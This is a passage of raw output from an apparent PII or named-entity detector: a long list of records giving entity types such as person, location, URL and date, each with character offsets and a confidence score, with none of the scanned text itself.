47612, score: 0.85, type: LOCATION, start: 47828, end: 47850, score: 0.85, type: LOCATION, start: 47930, end: 47952, score: 0.85, type: LOCATION, start: 48038, end: 48060, score: 0.85, type: LOCATION, start: 48147, end: 48169, score: 0.85, type: PERSON, start: 48296, end: 48304, score: 0.85, type: URL, start: 48324, end: 48331, score: 0.85, type: LOCATION, start: 48349, end: 48371, score: 0.85, type: URL, start: 48349, end: 48356, score: 0.85, type: LOCATION, start: 48450, end: 48472, score: 0.85, type: LOCATION, start: 48544, end: 48566, score: 0.85, type: PERSON, start: 48875, end: 48898, score: 0.85, type: PERSON, start: 48900, end: 48908, score: 0.85, type: PERSON, start: 49753, end: 49757, score: 0.85, type: LOCATION, start: 50472, end: 50494, score: 0.85, type: LOCATION, start: 50590, end: 50612, score: 0.85, type: PERSON, start: 51043, end: 51066, score: 0.85, type: URL, start: 52019, end: 52025, score: 0.85, type: PERSON, start: 53004, end: 53048, score: 0.85, type: PERSON, start: 53863, end: 53941, score: 0.85, type: LOCATION, start: 54720, end: 54742, score: 0.85, type: PERSON, start: 55026, end: 55049, score: 0.85, type: PERSON, start: 55661, end: 55674, score: 0.85, type: PERSON, start: 55678, end: 55701, score: 0.85, type: PERSON, start: 55719, end: 55732, score: 0.85, type: PERSON, start: 56901, end: 56926, score: 0.85, type: LOCATION, start: 58329, end: 58351, score: 0.85, type: PERSON, start: 58872, end: 58888, score: 0.85, type: PERSON, start: 58955, end: 58968, score: 0.85, type: PERSON, start: 59757, end: 59780, score: 0.85, type: LOCATION, start: 59861, end: 59874, score: 0.85, type: LOCATION, start: 60565, end: 60587, score: 0.85, type: LOCATION, start: 60658, end: 60680, score: 0.85, type: LOCATION, start: 60855, end: 60877, score: 0.85, type: PERSON, start: 63742, end: 63765, score: 0.85, type: PERSON, start: 64260, end: 64283, score: 0.85, type: LOCATION, start: 64906, end: 64928, score: 0.85, type: PERSON, start: 65720, end: 65743, score: 0.85, type: LOCATION, start: 66460, end: 66482, score: 0.85, type: PERSON, start: 66621, end: 66628, score: 0.85, type: LOCATION, start: 66763, end: 66785, score: 0.85, type: PERSON, start: 66916, end: 66923, score: 0.85, type: LOCATION, start: 67058, end: 67080, score: 0.85, type: LOCATION, start: 67174, end: 67196, score: 0.85, type: LOCATION, start: 67278, end: 67300, score: 0.85, type: PERSON, start: 67849, end: 67856, score: 0.85, type: DATE_TIME, start: 69049, end: 69050, score: 0.85, type: DATE_TIME, start: 69052, end: 69053, score: 0.85, type: PERSON, start: 69353, end: 69408, score: 0.85, type: PERSON, start: 69828, end: 69851, score: 0.85, type: PERSON, start: 70534, end: 70557, score: 0.85, type: LOCATION, start: 70559, end: 70572, score: 0.85, type: PERSON, start: 70620, end: 70643, score: 0.85, type: LOCATION, start: 70645, end: 70658, score: 0.85, type: LOCATION, start: 71086, end: 71108, score: 0.85, type: PERSON, start: 71438, end: 71461, score: 0.85, type: PERSON, start: 71625, end: 71638, score: 0.85, type: LOCATION, start: 71762, end: 71776, score: 0.85, type: LOCATION, start: 71830, end: 71844, score: 0.85, type: LOCATION, start: 71892, end: 71915, score: 0.85, type: LOCATION, start: 75214, end: 75236, score: 0.85, type: LOCATION, start: 75309, end: 75331, score: 0.85, type: LOCATION, start: 75427, end: 75449, score: 0.85, type: PERSON, start: 75588, end: 75595, score: 0.85, type: LOCATION, start: 75730, end: 75752, score: 0.85, type: PERSON, start: 75883, end: 75890, score: 0.85, type: LOCATION, start: 76022, end: 76044, score: 0.85, type: LOCATION, start: 76219, end: 76241, score: 0.85, type: PERSON, start: 76772, end: 76795, score: 0.85, type: PERSON, start: 77436, end: 77459, score: 0.85, type: LOCATION, start: 77579, end: 77581, score: 0.85, type: PERSON, start: 77914, end: 77921, score: 0.85, type: LOCATION, start: 80621, end: 80643, score: 0.85, type: LOCATION, start: 80738, end: 80760, score: 0.85, type: LOCATION, start: 80838, end: 80860, score: 0.85, type: PERSON, start: 80999, end: 81006, score: 0.85, type: LOCATION, start: 81141, end: 81163, score: 0.85, type: PERSON, start: 81294, end: 81301, score: 0.85, type: LOCATION, start: 81433, end: 81455, score: 0.85, type: LOCATION, start: 81627, end: 81649, score: 0.85, type: LOCATION, start: 81798, end: 81820, score: 0.85, type: LOCATION, start: 81995, end: 82017, score: 0.85, type: LOCATION, start: 82166, end: 82188, score: 0.85, type: LOCATION, start: 82329, end: 82351, score: 0.85, type: LOCATION, start: 82500, end: 82522, score: 0.85, type: LOCATION, start: 82699, end: 82721, score: 0.85, type: PERSON, start: 83530, end: 83553, score: 0.85, type: PERSON, start: 83685, end: 83708, score: 0.85, type: PERSON, start: 84031, end: 84038, score: 0.85, type: PERSON, start: 85396, end: 85419, score: 0.85, type: PERSON, start: 86130, end: 86153, score: 0.85, type: PERSON, start: 86848, end: 86871, score: 0.85, type: PERSON, start: 87692, end: 87715, score: 0.85, type: LOCATION, start: 88873, end: 88895, score: 0.85, type: PERSON, start: 89277, end: 89300, score: 0.85, type: PERSON, start: 89335, end: 89339, score: 0.85, type: LOCATION, start: 89585, end: 89625, score: 0.85, type: LOCATION, start: 90404, end: 90426, score: 0.85, type: LOCATION, start: 90524, end: 90546, score: 0.85, type: PERSON, start: 90842, end: 90865, score: 0.85, type: PERSON, start: 90920, end: 90927, score: 0.85, type: LOCATION, start: 91381, end: 91403, score: 0.85, type: PERSON, start: 91729, end: 91752, score: 0.85, type: LOCATION, start: 92344, end: 92366, score: 0.85, type: LOCATION, start: 93075, end: 93097, score: 0.85, type: LOCATION, start: 93820, end: 93842, score: 0.85, type: PERSON, start: 94148, end: 94178, score: 0.85, type: LOCATION, start: 94591, end: 94613, score: 0.85, type: LOCATION, start: 94889, end: 94914, score: 0.85, type: LOCATION, start: 95396, end: 95418, score: 0.85, type: LOCATION, start: 95510, end: 95532, score: 0.85, type: PERSON, start: 95814, end: 95837, score: 0.85, type: PERSON, start: 95892, end: 95899, score: 0.85, type: LOCATION, start: 96363, end: 96385, score: 0.85, type: PERSON, start: 96679, end: 96702, score: 0.85, type: PERSON, start: 96757, end: 96764, score: 0.85, type: DATE_TIME, start: 96890, end: 96897, score: 0.85, type: LOCATION, start: 97299, end: 97321, score: 0.85, type: LOCATION, start: 97412, end: 97434, score: 0.85, type: DATE_TIME, start: 97618, end: 97625, score: 0.85, type: PERSON, start: 97755, end: 97778, score: 0.85, type: DATE_TIME, start: 98179, end: 98185, score: 0.85, type: NRP, start: 98258, end: 98269, score: 0.85, type: DATE_TIME, start: 98785, end: 98791, score: 0.85, type: DATE_TIME, start: 98808, end: 98814, score: 0.85, type: LOCATION, start: 98930, end: 98952, score: 0.85, type: LOCATION, start: 99045, end: 99067, score: 0.85, type: DATE_TIME, start: 99078, end: 99084, score: 0.85, type: PERSON, start: 99394, end: 99417, score: 0.85, type: DATE_TIME, start: 99634, end: 99640, score: 0.85, type: DATE_TIME, start: 100074, end: 100078, score: 0.85, type: PERSON, start: 100551, end: 100566, score: 0.85, type: DATE_TIME, start: 100641, end: 100648, score: 0.85, type: PERSON, start: 101066, end: 101089, score: 0.85, type: PERSON, start: 101242, end: 101258, score: 0.85, type: DATE_TIME, start: 101531, end: 101535, score: 0.85, type: DATE_TIME, start: 101932, end: 101939, score: 0.85, type: LOCATION, start: 102688, end: 102710, score: 0.85, type: LOCATION, start: 102963, end: 102985, score: 0.85, type: LOCATION, start: 103089, end: 103111, score: 0.85, type: PERSON, start: 103250, end: 103257, score: 0.85, type: LOCATION, start: 103392, end: 103414, score: 0.85, type: PERSON, start: 103545, end: 103552, score: 0.85, type: PERSON, start: 104018, end: 104041, score: 0.85, type: PERSON, start: 104331, end: 104338, score: 0.85, type: LOCATION, start: 105711, end: 105733, score: 0.85, type: PERSON, start: 106065, end: 106088, score: 0.85, type: DATE_TIME, start: 107212, end: 107218, score: 0.85, type: LOCATION, start: 110582, end: 110604, score: 0.85, type: PERSON, start: 110922, end: 110945, score: 0.85, type: LOCATION, start: 110995, end: 111050, score: 0.85, type: PERSON, start: 111332, end: 111355, score: 0.85, type: LOCATION, start: 111807, end: 111829, score: 0.85, type: LOCATION, start: 111914, end: 111936, score: 0.85, type: DATE_TIME, start: 113120, end: 113124, score: 0.85, type: PERSON, start: 115540, end: 115566, score: 0.85, type: URL, start: 767, end: 795, score: 0.6, type: IP_ADDRESS, start: 87585, end: 87586, score: 0.6, type: IP_ADDRESS, start: 111252, end: 111254, score: 0.6, type: URL, start: 45, end: 54, score: 0.5, type: URL, start: 86, end: 95, score: 0.5, type: URL, start: 1026, end: 1045, score: 0.5, type: URL, start: 1331, end: 1348, score: 0.5, type: URL, start: 1380, end: 1397, score: 0.5, type: URL, start: 1439, end: 1456, score: 0.5, type: URL, start: 1488, end: 1505, score: 0.5, type: URL, start: 1537, end: 1554, score: 0.5, type: URL, start: 1593, end: 1604, score: 0.5, type: URL, start: 1635, end: 1651, score: 0.5, type: URL, start: 1671, end: 1689, score: 0.5, type: URL, start: 1715, end: 1733, score: 0.5, type: URL, start: 1761, end: 1773, score: 0.5, type: URL, start: 2040, end: 2053, score: 0.5, type: URL, start: 2080, end: 2093, score: 0.5, type: URL, start: 2116, end: 2129, score: 0.5, type: URL, start: 2153, end: 2166, score: 0.5, type: URL, start: 2191, end: 2204, score: 0.5, type: URL, start: 2228, end: 2241, score: 0.5, type: URL, start: 2265, end: 2278, score: 0.5, type: URL, start: 2303, end: 2316, score: 0.5, type: URL, start: 2348, end: 2361, score: 0.5, type: URL, start: 2385, end: 2398, score: 0.5, type: URL, start: 2422, end: 2435, score: 0.5, type: URL, start: 2458, end: 2471, score: 0.5, type: URL, start: 2496, end: 2509, score: 0.5, type: URL, start: 2979, end: 2985, score: 0.5, type: URL, start: 3082, end: 3088, score: 0.5, type: URL, start: 3689, end: 3696, score: 0.5, type: URL, start: 3826, end: 3841, score: 0.5, type: URL, start: 3875, end: 3884, score: 0.5, type: URL, start: 4210, end: 4225, score: 0.5, type: URL, start: 4308, end: 4317, score: 0.5, type: URL, start: 4423, end: 4430, score: 0.5, type: URL, start: 4883, end: 4892, score: 0.5, type: URL, start: 5413, end: 5420, score: 0.5, type: URL, start: 5540, end: 5547, score: 0.5, type: URL, start: 5691, end: 5698, score: 0.5, type: URL, start: 5865, end: 5872, score: 0.5, type: URL, start: 5910, end: 5917, score: 0.5, type: URL, start: 6177, end: 6189, score: 0.5, type: URL, start: 6201, end: 6210, score: 0.5, type: URL, start: 6732, end: 6741, score: 0.5, type: URL, start: 6810, end: 6819, score: 0.5, type: URL, start: 7166, end: 7173, score: 0.5, type: URL, start: 7383, end: 7392, score: 0.5, type: URL, start: 7430, end: 7437, score: 0.5, type: URL, start: 7448, end: 7455, score: 0.5, type: URL, start: 7466, end: 7473, score: 0.5, type: URL, start: 7489, end: 7496, score: 0.5, type: URL, start: 7704, end: 7713, score: 0.5, type: URL, start: 9907, end: 9914, score: 0.5, type: URL, start: 10052, end: 10059, score: 0.5, type: URL, start: 10072, end: 10079, score: 0.5, type: URL, start: 10090, end: 10097, score: 0.5, type: URL, start: 10106, end: 10112, score: 0.5, type: URL, start: 10127, end: 10134, score: 0.5, type: URL, start: 10143, end: 10147, score: 0.5, type: URL, start: 10196, end: 10203, score: 0.5, type: URL, start: 10613, end: 10621, score: 0.5, type: URL, start: 11171, end: 11178, score: 0.5, type: URL, start: 11182, end: 11189, score: 0.5, type: URL, start: 11307, end: 11314, score: 0.5, type: URL, start: 11318, end: 11325, score: 0.5, type: URL, start: 13709, end: 13716, score: 0.5, type: URL, start: 13732, end: 13738, score: 0.5, type: URL, start: 13984, end: 13993, score: 0.5, type: URL, start: 14023, end: 14032, score: 0.5, type: URL, start: 16662, end: 16671, score: 0.5, type: URL, start: 18079, end: 18086, score: 0.5, type: URL, start: 18108, end: 18115, score: 0.5, type: URL, start: 18147, end: 18154, score: 0.5, type: URL, start: 18234, end: 18241, score: 0.5, type: URL, start: 18306, end: 18313, score: 0.5, type: URL, start: 18447, end: 18454, score: 0.5, type: URL, start: 18530, end: 18537, score: 0.5, type: URL, start: 18611, end: 18618, score: 0.5, type: URL, start: 18678, end: 18685, score: 0.5, type: URL, start: 19742, end: 19758, score: 0.5, type: URL, start: 19816, end: 19823, score: 0.5, type: URL, start: 19925, end: 19941, score: 0.5, type: URL, start: 19999, end: 20006, score: 0.5, type: URL, start: 20087, end: 20107, score: 0.5, type: URL, start: 20159, end: 20166, score: 0.5, type: URL, start: 20680, end: 20690, score: 0.5, type: URL, start: 20714, end: 20724, score: 0.5, type: URL, start: 21105, end: 21117, score: 0.5, type: URL, start: 21185, end: 21197, score: 0.5, type: URL, start: 21240, end: 21252, score: 0.5, type: URL, start: 21312, end: 21324, score: 0.5, type: URL, start: 21777, end: 21782, score: 0.5, type: URL, start: 22696, end: 22703, score: 0.5, type: URL, start: 22717, end: 22724, score: 0.5, type: URL, start: 22794, end: 22803, score: 0.5, type: URL, start: 22932, end: 22939, score: 0.5, type: URL, start: 23018, end: 23027, score: 0.5, type: URL, start: 23029, end: 23036, score: 0.5, type: URL, start: 23688, end: 23695, score: 0.5, type: URL, start: 23706, end: 23713, score: 0.5, type: URL, start: 23771, end: 23794, score: 0.5, type: URL, start: 23826, end: 23833, score: 0.5, type: URL, start: 23875, end: 23892, score: 0.5, type: URL, start: 23962, end: 23979, score: 0.5, type: URL, start: 23997, end: 24004, score: 0.5, type: URL, start: 24017, end: 24024, score: 0.5, type: URL, start: 24064, end: 24077, score: 0.5, type: URL, start: 24337, end: 24354, score: 0.5, type: URL, start: 24383, end: 24390, score: 0.5, type: URL, start: 24400, end: 24407, score: 0.5, type: URL, start: 24471, end: 24482, score: 0.5, type: URL, start: 24544, end: 24555, score: 0.5, type: URL, start: 25913, end: 25924, score: 0.5, type: URL, start: 26189, end: 26196, score: 0.5, type: URL, start: 26212, end: 26219, score: 0.5, type: URL, start: 26303, end: 26310, score: 0.5, type: URL, start: 26391, end: 26398, score: 0.5, type: URL, start: 26506, end: 26513, score: 0.5, type: URL, start: 26750, end: 26757, score: 0.5, type: URL, start: 26760, end: 26772, score: 0.5, type: URL, start: 26784, end: 26791, score: 0.5, type: URL, start: 26968, end: 26973, score: 0.5, type: URL, start: 27160, end: 27167, score: 0.5, type: URL, start: 27953, end: 27963, score: 0.5, type: URL, start: 28042, end: 28066, score: 0.5, type: URL, start: 28072, end: 28096, score: 0.5, type: URL, start: 28138, end: 28150, score: 0.5, type: URL, start: 28194, end: 28200, score: 0.5, type: URL, start: 28209, end: 28216, score: 0.5, type: URL, start: 29020, end: 29031, score: 0.5, type: URL, start: 29137, end: 29144, score: 0.5, type: URL, start: 29160, end: 29167, score: 0.5, type: URL, start: 29251, end: 29258, score: 0.5, type: URL, start: 29339, end: 29346, score: 0.5, type: URL, start: 29577, end: 29584, score: 0.5, type: URL, start: 29587, end: 29599, score: 0.5, type: URL, start: 29611, end: 29618, score: 0.5, type: URL, start: 29810, end: 29816, score: 0.5, type: URL, start: 30048, end: 30056, score: 0.5, type: URL, start: 30102, end: 30142, score: 0.5, type: URL, start: 30280, end: 30287, score: 0.5, type: URL, start: 30336, end: 30343, score: 0.5, type: URL, start: 30411, end: 30418, score: 0.5, type: URL, start: 30487, end: 30493, score: 0.5, type: URL, start: 31393, end: 31404, score: 0.5, type: URL, start: 31510, end: 31517, score: 0.5, type: URL, start: 31533, end: 31540, score: 0.5, type: URL, start: 31624, end: 31631, score: 0.5, type: URL, start: 31697, end: 31704, score: 0.5, type: URL, start: 31717, end: 31724, score: 0.5, type: URL, start: 31913, end: 31920, score: 0.5, type: URL, start: 31988, end: 31995, score: 0.5, type: URL, start: 32007, end: 32014, score: 0.5, type: URL, start: 32276, end: 32283, score: 0.5, type: URL, start: 32286, end: 32298, score: 0.5, type: URL, start: 32310, end: 32317, score: 0.5, type: URL, start: 32559, end: 32566, score: 0.5, type: URL, start: 32597, end: 32604, score: 0.5, type: URL, start: 32990, end: 32996, score: 0.5, type: URL, start: 33250, end: 33256, score: 0.5, type: URL, start: 33364, end: 33369, score: 0.5, type: URL, start: 33428, end: 33433, score: 0.5, type: URL, start: 33717, end: 33724, score: 0.5, type: URL, start: 33847, end: 33853, score: 0.5, type: URL, start: 33907, end: 33913, score: 0.5, type: URL, start: 33996, end: 34002, score: 0.5, type: URL, start: 34101, end: 34107, score: 0.5, type: URL, start: 34551, end: 34558, score: 0.5, type: URL, start: 34581, end: 34593, score: 0.5, type: URL, start: 34953, end: 34959, score: 0.5, type: URL, start: 34967, end: 34977, score: 0.5, type: URL, start: 34988, end: 34998, score: 0.5, type: URL, start: 35013, end: 35020, score: 0.5, type: URL, start: 35255, end: 35261, score: 0.5, type: URL, start: 35268, end: 35275, score: 0.5, type: URL, start: 35312, end: 35318, score: 0.5, type: URL, start: 35347, end: 35354, score: 0.5, type: URL, start: 35562, end: 35567, score: 0.5, type: URL, start: 35669, end: 35680, score: 0.5, type: URL, start: 35739, end: 35747, score: 0.5, type: URL, start: 35797, end: 35837, score: 0.5, type: URL, start: 35957, end: 35963, score: 0.5, type: URL, start: 36762, end: 36773, score: 0.5, type: URL, start: 36879, end: 36886, score: 0.5, type: URL, start: 36902, end: 36909, score: 0.5, type: URL, start: 36993, end: 37000, score: 0.5, type: URL, start: 37081, end: 37088, score: 0.5, type: URL, start: 37329, end: 37336, score: 0.5, type: URL, start: 37339, end: 37351, score: 0.5, type: URL, start: 37363, end: 37370, score: 0.5, type: URL, start: 37562, end: 37568, score: 0.5, type: URL, start: 37795, end: 37801, score: 0.5, type: URL, start: 37850, end: 37856, score: 0.5, type: URL, start: 38056, end: 38062, score: 0.5, type: URL, start: 38157, end: 38169, score: 0.5, type: URL, start: 38521, end: 38540, score: 0.5, type: URL, start: 38836, end: 38847, score: 0.5, type: URL, start: 38972, end: 38979, score: 0.5, type: URL, start: 38995, end: 39002, score: 0.5, type: URL, start: 39299, end: 39306, score: 0.5, type: URL, start: 39352, end: 39357, score: 0.5, type: URL, start: 39760, end: 39767, score: 0.5, type: URL, start: 39770, end: 39782, score: 0.5, type: URL, start: 39794, end: 39801, score: 0.5, type: URL, start: 39941, end: 39946, score: 0.5, type: URL, start: 40075, end: 40082, score: 0.5, type: URL, start: 40682, end: 40689, score: 0.5, type: URL, start: 40701, end: 40708, score: 0.5, type: URL, start: 40791, end: 40798, score: 0.5, type: URL, start: 41143, end: 41150, score: 0.5, type: URL, start: 41724, end: 41729, score: 0.5, type: URL, start: 41791, end: 41801, score: 0.5, type: URL, start: 43134, end: 43141, score: 0.5, type: URL, start: 43153, end: 43160, score: 0.5, type: URL, start: 43444, end: 43451, score: 0.5, type: URL, start: 43516, end: 43521, score: 0.5, type: URL, start: 43593, end: 43598, score: 0.5, type: URL, start: 44093, end: 44105, score: 0.5, type: URL, start: 44170, end: 44175, score: 0.5, type: URL, start: 44223, end: 44231, score: 0.5, type: URL, start: 44279, end: 44290, score: 0.5, type: URL, start: 44300, end: 44308, score: 0.5, type: URL, start: 44403, end: 44413, score: 0.5, type: URL, start: 44496, end: 44506, score: 0.5, type: URL, start: 44767, end: 44777, score: 0.5, type: URL, start: 44819, end: 44829, score: 0.5, type: URL, start: 44863, end: 44873, score: 0.5, type: URL, start: 45456, end: 45463, score: 0.5, type: URL, start: 45821, end: 45830, score: 0.5, type: URL, start: 45903, end: 45913, score: 0.5, type: URL, start: 46029, end: 46033, score: 0.5, type: URL, start: 46319, end: 46324, score: 0.5, type: URL, start: 46385, end: 46393, score: 0.5, type: URL, start: 46432, end: 46441, score: 0.5, type: URL, start: 46540, end: 46549, score: 0.5, type: URL, start: 46656, end: 46660, score: 0.5, type: URL, start: 47810, end: 47817, score: 0.5, type: URL, start: 47828, end: 47835, score: 0.5, type: URL, start: 47903, end: 47910, score: 0.5, type: URL, start: 47930, end: 47937, score: 0.5, type: URL, start: 48013, end: 48020, score: 0.5, type: URL, start: 48038, end: 48045, score: 0.5, type: URL, start: 48119, end: 48127, score: 0.5, type: URL, start: 48147, end: 48154, score: 0.5, type: URL, start: 48450, end: 48457, score: 0.5, type: URL, start: 48544, end: 48551, score: 0.5, type: URL, start: 48810, end: 48817, score: 0.5, type: URL, start: 48828, end: 48840, score: 0.5, type: URL, start: 48973, end: 48980, score: 0.5, type: URL, start: 48996, end: 49003, score: 0.5, type: URL, start: 49008, end: 49020, score: 0.5, type: URL, start: 49110, end: 49123, score: 0.5, type: URL, start: 49131, end: 49138, score: 0.5, type: URL, start: 49157, end: 49165, score: 0.5, type: URL, start: 49184, end: 49191, score: 0.5, type: URL, start: 49252, end: 49259, score: 0.5, type: URL, start: 49327, end: 49334, score: 0.5, type: URL, start: 49456, end: 49463, score: 0.5, type: URL, start: 49833, end: 49845, score: 0.5, type: URL, start: 49866, end: 49873, score: 0.5, type: URL, start: 49928, end: 49937, score: 0.5, type: URL, start: 50472, end: 50479, score: 0.5, type: URL, start: 50569, end: 50576, score: 0.5, type: URL, start: 50590, end: 50597, score: 0.5, type: URL, start: 50992, end: 51002, score: 0.5, type: URL, start: 51131, end: 51143, score: 0.5, type: URL, start: 51170, end: 51177, score: 0.5, type: URL, start: 51225, end: 51237, score: 0.5, type: URL, start: 51280, end: 51292, score: 0.5, type: URL, start: 51638, end: 51645, score: 0.5, type: URL, start: 51694, end: 51701, score: 0.5, type: URL, start: 51796, end: 51803, score: 0.5, type: URL, start: 51836, end: 51843, score: 0.5, type: URL, start: 52117, end: 52129, score: 0.5, type: URL, start: 52601, end: 52611, score: 0.5, type: URL, start: 52716, end: 52726, score: 0.5, type: URL, start: 52770, end: 52788, score: 0.5, type: URL, start: 52842, end: 52860, score: 0.5, type: URL, start: 52956, end: 52966, score: 0.5, type: URL, start: 53010, end: 53028, score: 0.5, type: URL, start: 53085, end: 53103, score: 0.5, type: URL, start: 53174, end: 53192, score: 0.5, type: URL, start: 53706, end: 53711, score: 0.5, type: URL, start: 53775, end: 53815, score: 0.5, type: URL, start: 53881, end: 53921, score: 0.5, type: URL, start: 53989, end: 54024, score: 0.5, type: URL, start: 54060, end: 54072, score: 0.5, type: URL, start: 54720, end: 54727, score: 0.5, type: URL, start: 54979, end: 54991, score: 0.5, type: URL, start: 55175, end: 55187, score: 0.5, type: URL, start: 55939, end: 55945, score: 0.5, type: URL, start: 56041, end: 56053, score: 0.5, type: URL, start: 56686, end: 56698, score: 0.5, type: URL, start: 56891, end: 56904, score: 0.5, type: URL, start: 57287, end: 57306, score: 0.5, type: URL, start: 57322, end: 57340, score: 0.5, type: URL, start: 57456, end: 57471, score: 0.5, type: URL, start: 58310, end: 58317, score: 0.5, type: URL, start: 58329, end: 58336, score: 0.5, type: URL, start: 58556, end: 58563, score: 0.5, type: URL, start: 58580, end: 58620, score: 0.5, type: URL, start: 58749, end: 58782, score: 0.5, type: URL, start: 59237, end: 59249, score: 0.5, type: URL, start: 59705, end: 59715, score: 0.5, type: URL, start: 60252, end: 60263, score: 0.5, type: URL, start: 60430, end: 60437, score: 0.5, type: URL, start: 60453, end: 60465, score: 0.5, type: URL, start: 60547, end: 60554, score: 0.5, type: URL, start: 60565, end: 60572, score: 0.5, type: URL, start: 60640, end: 60647, score: 0.5, type: URL, start: 60658, end: 60665, score: 0.5, type: URL, start: 60698, end: 60710, score: 0.5, type: URL, start: 60795, end: 60802, score: 0.5, type: URL, start: 60806, end: 60818, score: 0.5, type: URL, start: 60832, end: 60839, score: 0.5, type: URL, start: 60855, end: 60862, score: 0.5, type: URL, start: 61157, end: 61164, score: 0.5, type: URL, start: 61178, end: 61185, score: 0.5, type: URL, start: 61201, end: 61208, score: 0.5, type: URL, start: 61219, end: 61226, score: 0.5, type: URL, start: 61286, end: 61298, score: 0.5, type: URL, start: 61321, end: 61328, score: 0.5, type: URL, start: 61349, end: 61356, score: 0.5, type: URL, start: 61402, end: 61414, score: 0.5, type: URL, start: 61437, end: 61446, score: 0.5, type: URL, start: 61471, end: 61478, score: 0.5, type: URL, start: 61489, end: 61496, score: 0.5, type: URL, start: 61502, end: 61514, score: 0.5, type: URL, start: 61591, end: 61598, score: 0.5, type: URL, start: 61705, end: 61715, score: 0.5, type: URL, start: 61749, end: 61761, score: 0.5, type: URL, start: 61869, end: 61876, score: 0.5, type: URL, start: 61914, end: 61926, score: 0.5, type: URL, start: 61946, end: 61958, score: 0.5, type: URL, start: 61980, end: 61992, score: 0.5, type: URL, start: 62082, end: 62089, score: 0.5, type: URL, start: 62578, end: 62585, score: 0.5, type: URL, start: 62622, end: 62634, score: 0.5, type: URL, start: 62657, end: 62664, score: 0.5, type: URL, start: 62685, end: 62692, score: 0.5, type: URL, start: 62738, end: 62750, score: 0.5, type: URL, start: 62773, end: 62782, score: 0.5, type: URL, start: 62807, end: 62814, score: 0.5, type: URL, start: 62825, end: 62832, score: 0.5, type: URL, start: 62838, end: 62850, score: 0.5, type: URL, start: 62927, end: 62934, score: 0.5, type: URL, start: 63012, end: 63024, score: 0.5, type: URL, start: 63131, end: 63138, score: 0.5, type: URL, start: 63172, end: 63184, score: 0.5, type: URL, start: 63204, end: 63216, score: 0.5, type: URL, start: 63238, end: 63250, score: 0.5, type: URL, start: 63340, end: 63347, score: 0.5, type: URL, start: 63643, end: 63650, score: 0.5, type: URL, start: 63700, end: 63709, score: 0.5, type: URL, start: 64640, end: 64651, score: 0.5, type: URL, start: 64883, end: 64890, score: 0.5, type: URL, start: 64906, end: 64913, score: 0.5, type: URL, start: 66439, end: 66446, score: 0.5, type: URL, start: 66460, end: 66467, score: 0.5, type: URL, start: 66742, end: 66749, score: 0.5, type: URL, start: 66763, end: 66770, score: 0.5, type: URL, start: 67058, end: 67065, score: 0.5, type: URL, start: 67174, end: 67181, score: 0.5, type: URL, start: 67258, end: 67265, score: 0.5, type: URL, start: 67278, end: 67285, score: 0.5, type: URL, start: 67615, end: 67625, score: 0.5, type: URL, start: 67661, end: 67671, score: 0.5, type: URL, start: 68165, end: 68172, score: 0.5, type: URL, start: 68206, end: 68213, score: 0.5, type: URL, start: 68289, end: 68296, score: 0.5, type: URL, start: 68330, end: 68337, score: 0.5, type: URL, start: 68484, end: 68495, score: 0.5, type: URL, start: 68549, end: 68556, score: 0.5, type: URL, start: 68708, end: 68715, score: 0.5, type: URL, start: 68750, end: 68757, score: 0.5, type: URL, start: 68871, end: 68878, score: 0.5, type: URL, start: 69025, end: 69032, score: 0.5, type: URL, start: 69123, end: 69135, score: 0.5, type: URL, start: 69150, end: 69157, score: 0.5, type: URL, start: 69343, end: 69356, score: 0.5, type: URL, start: 69778, end: 69789, score: 0.5, type: URL, start: 70308, end: 70318, score: 0.5, type: URL, start: 70362, end: 70372, score: 0.5, type: URL, start: 70946, end: 70957, score: 0.5, type: URL, start: 71063, end: 71070, score: 0.5, type: URL, start: 71086, end: 71093, score: 0.5, type: URL, start: 71342, end: 71349, score: 0.5, type: URL, start: 71352, end: 71364, score: 0.5, type: URL, start: 71376, end: 71383, score: 0.5, type: URL, start: 71572, end: 71579, score: 0.5, type: URL, start: 71657, end: 71664, score: 0.5, type: URL, start: 71739, end: 71745, score: 0.5, type: URL, start: 71784, end: 71790, score: 0.5, type: URL, start: 72383, end: 72389, score: 0.5, type: URL, start: 72430, end: 72436, score: 0.5, type: URL, start: 72481, end: 72487, score: 0.5, type: URL, start: 72538, end: 72544, score: 0.5, type: URL, start: 72600, end: 72606, score: 0.5, type: URL, start: 72784, end: 72790, score: 0.5, type: URL, start: 72832, end: 72838, score: 0.5, type: URL, start: 73371, end: 73377, score: 0.5, type: URL, start: 73436, end: 73442, score: 0.5, type: URL, start: 73499, end: 73505, score: 0.5, type: URL, start: 73543, end: 73553, score: 0.5, type: URL, start: 73617, end: 73623, score: 0.5, type: URL, start: 73665, end: 73672, score: 0.5, type: URL, start: 73787, end: 73793, score: 0.5, type: URL, start: 73810, end: 73820, score: 0.5, type: URL, start: 73830, end: 73836, score: 0.5, type: URL, start: 73888, end: 73912, score: 0.5, type: URL, start: 73954, end: 73966, score: 0.5, type: URL, start: 73985, end: 73991, score: 0.5, type: URL, start: 74074, end: 74098, score: 0.5, type: URL, start: 74233, end: 74257, score: 0.5, type: URL, start: 74761, end: 74772, score: 0.5, type: URL, start: 75191, end: 75198, score: 0.5, type: URL, start: 75214, end: 75221, score: 0.5, type: URL, start: 75309, end: 75316, score: 0.5, type: URL, start: 75406, end: 75413, score: 0.5, type: URL, start: 75427, end: 75434, score: 0.5, type: URL, start: 75709, end: 75716, score: 0.5, type: URL, start: 75730, end: 75737, score: 0.5, type: URL, start: 76022, end: 76029, score: 0.5, type: URL, start: 76196, end: 76203, score: 0.5, type: URL, start: 76219, end: 76226, score: 0.5, type: URL, start: 76268, end: 76280, score: 0.5, type: URL, start: 76525, end: 76532, score: 0.5, type: URL, start: 76535, end: 76547, score: 0.5, type: URL, start: 76559, end: 76566, score: 0.5, type: URL, start: 76721, end: 76731, score: 0.5, type: URL, start: 76924, end: 76931, score: 0.5, type: URL, start: 76939, end: 76946, score: 0.5, type: URL, start: 77680, end: 77690, score: 0.5, type: URL, start: 77726, end: 77736, score: 0.5, type: URL, start: 78328, end: 78335, score: 0.5, type: URL, start: 78369, end: 78376, score: 0.5, type: URL, start: 78452, end: 78459, score: 0.5, type: URL, start: 78493, end: 78500, score: 0.5, type: URL, start: 78633, end: 78644, score: 0.5, type: URL, start: 78695, end: 78733, score: 0.5, type: URL, start: 78770, end: 78777, score: 0.5, type: URL, start: 78817, end: 78829, score: 0.5, type: URL, start: 78929, end: 78936, score: 0.5, type: URL, start: 78978, end: 78990, score: 0.5, type: URL, start: 79018, end: 79025, score: 0.5, type: URL, start: 79423, end: 79434, score: 0.5, type: URL, start: 80500, end: 80507, score: 0.5, type: URL, start: 80523, end: 80535, score: 0.5, type: URL, start: 80598, end: 80605, score: 0.5, type: URL, start: 80621, end: 80628, 